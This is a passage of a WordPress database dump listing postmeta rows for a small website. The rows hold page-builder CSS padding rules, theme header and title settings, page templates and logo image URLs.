!important;}'),(3567,1730,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3568,1730,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3569,1730,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3570,1730,'_wpb_shortcodes_custom_css','.vc_custom_1520330349854{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3571,1730,'_wpb_shortcodes_custom_css','.vc_custom_1520330349854{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3572,1730,'_wpb_shortcodes_custom_css','.vc_custom_1520330349854{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3573,1730,'_wp_page_template','full-width.php'),(3574,1730,'slide_template','default'),(3575,1730,'_wpb_vc_js_status','true'),(3576,1730,'qodef_page_content_behind_header_meta','no'),(3577,1730,'qodef_boxed_background_image_attachment_meta','fixed'),(3578,1730,'qodef_disable_vertical_header_background_image_meta','no'),(3579,1730,'qodef_disable_header_widget_logo_area_meta','no'),(3580,1730,'qodef_disable_header_widget_menu_area_meta','no'),(3581,1730,'qodef_page_content_top_padding','0'),(3582,1730,'qodef_page_content_top_padding_mobile','yes'),(3583,1730,'qodef_header_type_meta','header-centered'),(3584,1730,'qodef_header_behaviour_meta','no-behavior'),(3585,1730,'qodef_title_area_type_meta','breadcrumbs'),(3586,1730,'qodef_title_area_height_meta','140'),(3587,1730,'qodef_title_area_title_tag_meta','h3'),(3588,1730,'_dp_original','1728'),(3589,1735,'_wpb_shortcodes_custom_css','.vc_custom_1519218868361{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3590,1735,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3591,1735,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3592,1735,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3593,1735,'_wp_page_template','full-width.php'),(3594,1735,'slide_template','default'),(3595,1735,'_wpb_vc_js_status','true'),(3596,1735,'qodef_page_content_behind_header_meta','no'),(3597,1735,'qodef_boxed_background_image_attachment_meta','fixed'),(3598,1735,'qodef_disable_vertical_header_background_image_meta','no'),(3599,1735,'qodef_disable_header_widget_logo_area_meta','no'),(3600,1735,'qodef_disable_header_widget_menu_area_meta','no'),(3601,1735,'qodef_page_content_top_padding','0'),(3602,1735,'qodef_page_content_top_padding_mobile','yes'),(3603,1735,'qodef_header_type_meta','header-centered'),(3604,1735,'qodef_header_behaviour_meta','no-behavior'),(3605,1735,'qodef_title_area_type_meta','breadcrumbs'),(3606,1735,'qodef_title_area_height_meta','140'),(3607,1735,'qodef_title_area_title_tag_meta','h3'),(3608,1735,'_dp_original','1724'),(3609,1735,'_wpb_shortcodes_custom_css','.vc_custom_1519218868361{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3610,1735,'qodef_title_area_in_grid_meta','no'),(3611,1745,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3612,1745,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3613,1745,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3614,1745,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3615,1745,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3616,1745,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3617,1745,'_wp_page_template','full-width.php'),(3618,1745,'slide_template','default'),(3619,1745,'_wpb_vc_js_status','true'),(3620,1745,'qodef_page_content_behind_header_meta','no'),(3621,1745,'qodef_boxed_background_image_attachment_meta','fixed'),(3622,1745,'qodef_disable_vertical_header_background_image_meta','no'),(3623,1745,'qodef_disable_header_widget_logo_area_meta','no'),(3624,1745,'qodef_disable_header_widget_menu_area_meta','no'),(3625,1745,'qodef_page_content_top_padding','0'),(3626,1745,'qodef_page_content_top_padding_mobile','yes'),(3627,1745,'qodef_header_type_meta','header-centered'),(3628,1745,'qodef_header_behaviour_meta','no-behavior'),(3629,1745,'qodef_title_area_type_meta','breadcrumbs'),(3630,1745,'qodef_title_area_height_meta','140'),(3631,1745,'qodef_title_area_title_tag_meta','h3'),(3632,1745,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3633,1745,'_dp_original','1735'),(3634,1745,'qodef_title_area_in_grid_meta','no'),(3635,1749,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3636,1749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3637,1749,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3638,1749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3639,1749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3640,1749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3641,1749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3642,1749,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3643,1749,'_wpb_shortcodes_custom_css','.vc_custom_1517479581242{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3644,1749,'_wp_page_template','full-width.php'),(3645,1749,'slide_template','default'),(3646,1749,'_wpb_vc_js_status','true'),(3647,1749,'qodef_page_content_behind_header_meta','no'),(3648,1749,'qodef_boxed_background_image_attachment_meta','fixed'),(3649,1749,'qodef_disable_vertical_header_background_image_meta','no'),(3650,1749,'qodef_disable_header_widget_logo_area_meta','no'),(3651,1749,'qodef_disable_header_widget_menu_area_meta','no'),(3652,1749,'qodef_page_content_top_padding','0'),(3653,1749,'qodef_page_content_top_padding_mobile','yes'),(3654,1749,'qodef_header_type_meta','header-centered'),(3655,1749,'qodef_header_behaviour_meta','no-behavior'),(3656,1749,'qodef_title_area_type_meta','breadcrumbs'),(3657,1749,'qodef_title_area_height_meta','140'),(3658,1749,'qodef_title_area_title_tag_meta','h3'),(3659,1749,'_dp_original','1745'),(3660,1749,'qodef_title_area_in_grid_meta','no'),(3661,1752,'_wpb_shortcodes_custom_css','.vc_custom_1520513565854{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3662,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3663,1752,'_wpb_shortcodes_custom_css','.vc_custom_1520513565854{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3664,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3665,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3666,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3667,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3668,1752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3669,1752,'_wpb_shortcodes_custom_css','.vc_custom_1520513565854{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3670,1752,'_wpb_shortcodes_custom_css','.vc_custom_1520513565854{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3671,1752,'_wpb_shortcodes_custom_css','.vc_custom_1520513565854{padding-top: 25px !important;padding-right: 25px !important;padding-left: 25px !important;}'),(3672,1752,'_wp_page_template','full-width.php'),(3673,1752,'slide_template','default'),(3674,1752,'_wpb_vc_js_status','true'),(3675,1752,'qodef_page_content_behind_header_meta','no'),(3676,1752,'qodef_boxed_background_image_attachment_meta','fixed'),(3677,1752,'qodef_disable_vertical_header_background_image_meta','no'),(3678,1752,'qodef_disable_header_widget_logo_area_meta','no'),(3679,1752,'qodef_disable_header_widget_menu_area_meta','no'),(3680,1752,'qodef_page_content_top_padding','0'),(3681,1752,'qodef_page_content_top_padding_mobile','yes'),(3682,1752,'qodef_header_type_meta','header-centered'),(3683,1752,'qodef_header_behaviour_meta','no-behavior'),(3684,1752,'qodef_title_area_type_meta','breadcrumbs'),(3685,1752,'qodef_title_area_height_meta','140'),(3686,1752,'qodef_title_area_title_tag_meta','h3'),(3687,1752,'_dp_original','1749'),(3688,1752,'qodef_title_area_in_grid_meta','no'),(3689,1761,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3690,1761,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3691,1761,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3692,1761,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3693,1761,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3694,1761,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3695,1761,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3696,1761,'_wp_page_template','full-width.php'),(3697,1761,'slide_template','default'),(3698,1761,'_wpb_vc_js_status','true'),(3699,1761,'qodef_page_content_behind_header_meta','no'),(3700,1761,'qodef_boxed_background_image_attachment_meta','fixed'),(3701,1761,'qodef_disable_vertical_header_background_image_meta','no'),(3702,1761,'qodef_disable_header_widget_logo_area_meta','no'),(3703,1761,'qodef_disable_header_widget_menu_area_meta','no'),(3704,1761,'qodef_page_content_top_padding','0'),(3705,1761,'qodef_page_content_top_padding_mobile','yes'),(3706,1761,'qodef_header_type_meta','header-standard'),(3707,1761,'qodef_header_behaviour_meta','no-behavior'),(3708,1761,'qodef_title_area_type_meta','standard-with-breadcrumbs'),(3709,1761,'qodef_title_area_height_meta','140'),(3710,1761,'qodef_title_area_title_tag_meta','h2'),(3711,1761,'_dp_original','1700'),(3712,1762,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3713,1762,'_wp_page_template','default'),(3714,1762,'slide_template','default'),(3715,1762,'_wpb_vc_js_status','false'),(3716,1762,'qodef_page_content_behind_header_meta','no'),(3717,1762,'qodef_boxed_background_image_attachment_meta','fixed'),(3718,1762,'qodef_disable_vertical_header_background_image_meta','no'),(3719,1762,'qodef_disable_header_widget_logo_area_meta','no'),(3720,1762,'qodef_disable_header_widget_menu_area_meta','no'),(3721,1767,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3722,1767,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3723,1767,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3724,1767,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3725,1767,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3726,1767,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3727,1767,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3728,1767,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3729,1767,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3730,1767,'_wp_page_template','full-width.php'),(3731,1767,'slide_template','default'),(3732,1767,'_wpb_vc_js_status','true'),(3733,1767,'qodef_page_content_behind_header_meta','no'),(3734,1767,'qodef_boxed_background_image_attachment_meta','fixed'),(3735,1767,'qodef_disable_vertical_header_background_image_meta','no'),(3736,1767,'qodef_disable_header_widget_logo_area_meta','no'),(3737,1767,'qodef_disable_header_widget_menu_area_meta','no'),(3738,1767,'qodef_page_content_top_padding','0'),(3739,1767,'qodef_page_content_top_padding_mobile','yes'),(3740,1767,'qodef_header_type_meta','header-standard'),(3741,1767,'qodef_header_behaviour_meta','no-behavior'),(3742,1767,'qodef_title_area_type_meta','standard-with-breadcrumbs'),(3743,1767,'qodef_title_area_height_meta','140'),(3744,1767,'qodef_title_area_title_tag_meta','h2'),(3745,1767,'_dp_original','1761'),(3746,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3747,1769,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3748,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3749,1769,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3750,1769,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3751,1769,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3752,1769,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3753,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3754,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3755,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3756,1769,'_wpb_shortcodes_custom_css','.vc_custom_1517413458719{padding-top: 82px !important;padding-bottom: 44px !important;}'),(3757,1769,'_wp_page_template','full-width.php'),(3758,1769,'slide_template','default'),(3759,1769,'_wpb_vc_js_status','true'),(3760,1769,'qodef_page_content_behind_header_meta','no'),(3761,1769,'qodef_boxed_background_image_attachment_meta','fixed'),(3762,1769,'qodef_disable_vertical_header_background_image_meta','no'),(3763,1769,'qodef_disable_header_widget_logo_area_meta','no'),(3764,1769,'qodef_disable_header_widget_menu_area_meta','no'),(3765,1769,'qodef_page_content_top_padding','0'),(3766,1769,'qodef_page_content_top_padding_mobile','yes'),(3767,1769,'qodef_header_type_meta','header-standard'),(3768,1769,'qodef_header_behaviour_meta','no-behavior'),(3769,1769,'qodef_title_area_type_meta','standard-with-breadcrumbs'),(3770,1769,'qodef_title_area_height_meta','140'),(3771,1769,'qodef_title_area_title_tag_meta','h2'),(3772,1769,'_dp_original','1767'),(3773,2037,'_wpb_shortcodes_custom_css','.vc_custom_1519212238625{padding-top: 117px !important;padding-bottom: 51px !important;}.vc_custom_1517831261781{padding-bottom: 94px !important;}.vc_custom_1517831294087{padding-bottom: 42px !important;}.vc_custom_1519212260085{padding-bottom: 120px !important;}'),(3774,2037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3775,2037,'_wp_page_template','full-width.php'),(3776,2037,'slide_template','default'),(3777,2037,'_wpb_vc_js_status','true'),(3778,2037,'qodef_page_content_behind_header_meta','no'),(3779,2037,'qodef_boxed_background_image_attachment_meta','fixed'),(3780,2037,'qodef_disable_vertical_header_background_image_meta','no'),(3781,2037,'qodef_disable_header_widget_logo_area_meta','no'),(3782,2037,'qodef_disable_header_widget_menu_area_meta','no'),(3783,2037,'qodef_header_type_meta','header-standard'),(3784,2037,'qodef_set_menu_area_position_meta','center'),(3785,2037,'qodef_show_title_area_meta','no'),(3786,2037,'qodef_page_content_top_padding','0'),(3787,2037,'qodef_page_content_top_padding_mobile','yes'),(3788,2037,'_wpb_shortcodes_custom_css','.vc_custom_1519212238625{padding-top: 117px !important;padding-bottom: 51px !important;}.vc_custom_1517831261781{padding-bottom: 94px !important;}.vc_custom_1517831294087{padding-bottom: 42px !important;}.vc_custom_1519212260085{padding-bottom: 120px !important;}'),(3789,2037,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3790,2037,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3791,2037,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3792,2037,'qodef_top_bar_meta','no'),(3793,2098,'_wpb_shortcodes_custom_css','.vc_custom_1521026493438{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1521026509874{padding-top: 79px !important;padding-bottom: 79px !important;}'),(3794,2098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3795,2098,'_wpb_shortcodes_custom_css','.vc_custom_1521026493438{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1521026509874{padding-top: 79px !important;padding-bottom: 79px !important;}'),(3796,2098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3797,2098,'_wp_page_template','full-width.php'),(3798,2098,'slide_template','default'),(3799,2098,'_wpb_vc_js_status','true'),(3800,2098,'_wpb_shortcodes_custom_css','.vc_custom_1521026493438{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1521026509874{padding-top: 79px !important;padding-bottom: 79px !important;}'),(3801,2098,'qodef_page_content_behind_header_meta','no'),(3802,2098,'qodef_boxed_background_image_attachment_meta','fixed'),(3803,2098,'qodef_disable_vertical_header_background_image_meta','no'),(3804,2098,'qodef_disable_header_widget_logo_area_meta','no'),(3805,2098,'qodef_disable_header_widget_menu_area_meta','no'),(3806,2098,'qodef_page_content_top_padding','0'),(3807,2098,'qodef_page_content_top_padding_mobile','yes'),(3808,2098,'qodef_header_type_meta','header-standard'),(3809,2098,'qodef_title_area_type_meta','breadcrumbs'),(3810,2098,'qodef_title_area_height_meta','140'),(3811,2098,'qodef_title_area_title_tag_meta','h2'),(3812,2098,'_dp_original','1338'),(3813,2098,'qodef_set_menu_area_position_meta','center'),(3814,2098,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3815,2098,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3816,2098,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3817,2098,'qodef_top_bar_meta','no'),(3818,2105,'_wpb_shortcodes_custom_css','.vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}.vc_custom_1517908137300{padding-top: 85px !important;padding-bottom: 85px !important;}.vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}'),(3819,2105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3820,2105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3821,2105,'_wp_page_template','full-width.php'),(3822,2105,'slide_template','default'),(3823,2105,'_wpb_vc_js_status','true'),(3824,2105,'qodef_page_content_behind_header_meta','no'),(3825,2105,'qodef_boxed_background_image_attachment_meta','fixed'),(3826,2105,'qodef_disable_vertical_header_background_image_meta','no'),(3827,2105,'qodef_disable_header_widget_logo_area_meta','no'),(3828,2105,'qodef_disable_header_widget_menu_area_meta','no'),(3829,2105,'qodef_page_content_top_padding','0'),(3830,2105,'qodef_page_content_top_padding_mobile','yes'),(3831,2105,'qodef_header_type_meta','header-standard'),(3832,2105,'qodef_title_area_type_meta','breadcrumbs'),(3833,2105,'qodef_title_area_height_meta','140'),(3834,2105,'qodef_title_area_title_tag_meta','h2'),(3835,2105,'_dp_original','1338'),(3836,2105,'_wpb_shortcodes_custom_css','.vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}.vc_custom_1517908137300{padding-top: 85px !important;padding-bottom: 85px !important;}.vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}'),(3837,2105,'qodef_set_menu_area_position_meta','center'),(3838,2105,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3839,2105,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3840,2105,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3841,2105,'qodef_top_bar_meta','no'),(3842,2180,'_wpb_shortcodes_custom_css','.vc_custom_1521033447677{padding-top: 79px !important;padding-bottom: 94px !important;}.vc_custom_1521033466391{padding-top: 79px !important;padding-bottom: 94px !important;}'),(3843,2180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3844,2180,'_wpb_shortcodes_custom_css','.vc_custom_1521033447677{padding-top: 79px !important;padding-bottom: 94px !important;}.vc_custom_1521033466391{padding-top: 79px !important;padding-bottom: 94px !important;}'),(3845,2180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3846,2180,'_wp_page_template','full-width.php'),(3847,2180,'slide_template','default'),(3848,2180,'_wpb_vc_js_status','true'),(3849,2180,'_wpb_shortcodes_custom_css','.vc_custom_1521033447677{padding-top: 79px !important;padding-bottom: 94px !important;}.vc_custom_1521033466391{padding-top: 79px !important;padding-bottom: 94px !important;}'),(3850,2180,'qodef_page_content_behind_header_meta','no'),(3851,2180,'qodef_boxed_background_image_attachment_meta','fixed'),(3852,2180,'qodef_disable_vertical_header_background_image_meta','no'),(3853,2180,'qodef_disable_header_widget_logo_area_meta','no'),(3854,2180,'qodef_disable_header_widget_menu_area_meta','no'),(3855,2180,'qodef_page_content_top_padding','0'),(3856,2180,'qodef_page_content_top_padding_mobile','yes'),(3857,2180,'qodef_header_type_meta','header-standard'),(3858,2180,'qodef_title_area_type_meta','breadcrumbs'),(3859,2180,'qodef_title_area_height_meta','140'),(3860,2180,'qodef_title_area_title_tag_meta','h2'),(3861,2180,'_dp_original','1338'),(3862,2180,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3863,2180,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3864,2180,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3865,2180,'qodef_top_bar_meta','no'),(3891,2207,'_wpb_shortcodes_custom_css','.vc_custom_1521033312537{padding-top: 71px !important;padding-bottom: 52px !important;}.vc_custom_1521033320208{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033330627{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033345456{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033351484{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033266580{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033257385{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1473936638912{padding-right: 5% !important;}.vc_custom_1474448267539{padding-right: 5% !important;}.vc_custom_1474448274946{padding-right: 5% !important;}.vc_custom_1473935261137{padding-right: 5% !important;}'),(3892,2207,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3893,2207,'_wpb_shortcodes_custom_css','.vc_custom_1521033312537{padding-top: 71px !important;padding-bottom: 52px !important;}.vc_custom_1521033320208{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033330627{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033345456{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033351484{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033266580{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033257385{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1473936638912{padding-right: 5% !important;}.vc_custom_1474448267539{padding-right: 5% !important;}.vc_custom_1474448274946{padding-right: 5% !important;}.vc_custom_1473935261137{padding-right: 5% !important;}'),(3894,2207,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3895,2207,'_wp_page_template','full-width.php'),(3896,2207,'slide_template','default'),(3897,2207,'_wpb_vc_js_status','true'),(3898,2207,'_wpb_shortcodes_custom_css','.vc_custom_1521033312537{padding-top: 71px !important;padding-bottom: 52px !important;}.vc_custom_1521033320208{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033330627{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033345456{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033351484{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033266580{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1521033257385{padding-top: 71px !important;padding-bottom: 54px !important;}.vc_custom_1473936638912{padding-right: 5% !important;}.vc_custom_1474448267539{padding-right: 5% !important;}.vc_custom_1474448274946{padding-right: 5% !important;}.vc_custom_1473935261137{padding-right: 5% !important;}'),(3899,2207,'qodef_page_content_behind_header_meta','no'),(3900,2207,'qodef_boxed_background_image_attachment_meta','fixed'),(3901,2207,'qodef_disable_vertical_header_background_image_meta','no'),(3902,2207,'qodef_disable_header_widget_logo_area_meta','no'),(3903,2207,'qodef_disable_header_widget_menu_area_meta','no'),(3904,2207,'qodef_page_content_top_padding','0'),(3905,2207,'qodef_page_content_top_padding_mobile','yes'),(3906,2207,'qodef_header_type_meta','header-standard'),(3907,2207,'qodef_title_area_type_meta','breadcrumbs'),(3908,2207,'qodef_title_area_height_meta','140'),(3909,2207,'qodef_title_area_title_tag_meta','h2'),(3910,2207,'_dp_original','1338'),(3911,2207,'qodef_set_menu_area_position_meta','center'),(3912,2207,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3913,2207,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3914,2207,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3915,2207,'qodef_top_bar_meta','no'),(3916,2217,'_wpb_shortcodes_custom_css','.vc_custom_1521031121060{padding-top: 99px !important;padding-bottom: 101px !important;}.vc_custom_1521031255554{padding-top: 101px !important;padding-bottom: 99px !important;}'),(3917,2217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3918,2217,'_wpb_shortcodes_custom_css','.vc_custom_1521031121060{padding-top: 99px !important;padding-bottom: 101px !important;}.vc_custom_1521031255554{padding-top: 101px !important;padding-bottom: 99px !important;}'),(3919,2217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3920,2217,'_wp_page_template','full-width.php'),(3921,2217,'slide_template','default'),(3922,2217,'_wpb_vc_js_status','true'),(3923,2217,'_wpb_shortcodes_custom_css','.vc_custom_1521031121060{padding-top: 99px !important;padding-bottom: 101px !important;}.vc_custom_1521031255554{padding-top: 101px !important;padding-bottom: 99px !important;}'),(3924,2217,'qodef_page_content_behind_header_meta','no'),(3925,2217,'qodef_boxed_background_image_attachment_meta','fixed'),(3926,2217,'qodef_disable_vertical_header_background_image_meta','no'),(3927,2217,'qodef_disable_header_widget_logo_area_meta','no'),(3928,2217,'qodef_disable_header_widget_menu_area_meta','no'),(3929,2217,'qodef_page_content_top_padding','0'),(3930,2217,'qodef_page_content_top_padding_mobile','yes'),(3931,2217,'qodef_header_type_meta','header-standard'),(3932,2217,'qodef_title_area_type_meta','breadcrumbs'),(3933,2217,'qodef_title_area_height_meta','140'),(3934,2217,'qodef_title_area_title_tag_meta','h2'),(3935,2217,'_dp_original','1338'),(3936,2217,'qodef_set_menu_area_position_meta','center'),(3937,2217,'qodef_top_bar_meta','no'),(3938,2217,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3939,2217,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3940,2217,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3941,2566,'_wpb_shortcodes_custom_css','.vc_custom_1521032142633{padding-top: 91px !important;padding-bottom: 94px !important;}.vc_custom_1519228478941{padding-top: 121px !important;padding-bottom: 124px !important;}'),(3942,2566,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3943,2566,'_wpb_shortcodes_custom_css','.vc_custom_1521032142633{padding-top: 91px !important;padding-bottom: 94px !important;}.vc_custom_1519228478941{padding-top: 121px !important;padding-bottom: 124px !important;}'),(3944,2566,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3945,2566,'_wp_page_template','full-width.php'),(3946,2566,'slide_template','default'),(3947,2566,'_wpb_vc_js_status','true'),(3948,2566,'_wpb_shortcodes_custom_css','.vc_custom_1521032142633{padding-top: 91px !important;padding-bottom: 94px !important;}.vc_custom_1519228478941{padding-top: 121px !important;padding-bottom: 124px 